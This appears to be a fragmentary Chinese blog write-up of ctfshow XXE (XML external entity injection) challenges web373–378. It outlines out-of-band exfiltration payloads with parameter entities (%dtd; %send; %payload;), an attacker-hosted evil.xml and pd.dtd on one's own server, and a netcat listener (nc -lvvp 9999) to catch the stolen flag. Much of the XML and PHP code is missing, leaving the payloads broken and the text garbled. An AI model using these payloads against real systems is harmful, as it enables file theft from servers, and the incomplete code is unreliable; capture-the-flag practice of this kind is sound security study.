文章目录
XEE漏洞的原理
- XEE漏洞的原理
- ctfshow-xxe
- web373
- web374,375,376
- web377
- web378
XML外部实体注入
ctfshow-xxe web373代码
DOCTYPE root-element [
//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123
evil.xml,需要与路径匹配
%payload;
//%号要进行实体编码成%
我解释一下,传入的xml,ip地址是自己evil.xml放入的文件地址
evil.xml其中的xxx就是自己服务器的IP地址,端口随便(只要开放端口都可以)
然后服务器监听,nc -lvvp 9999
这是服务器监听拿flag,我们还可以使用php文件
payload
# pd.dtd
%all;
//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123
evil.xml
%payload;
//%号要进行实体编码成%
xxe.php
# xxe.php
代码
关注
打赏
![]()
1688896170
查看更多评论
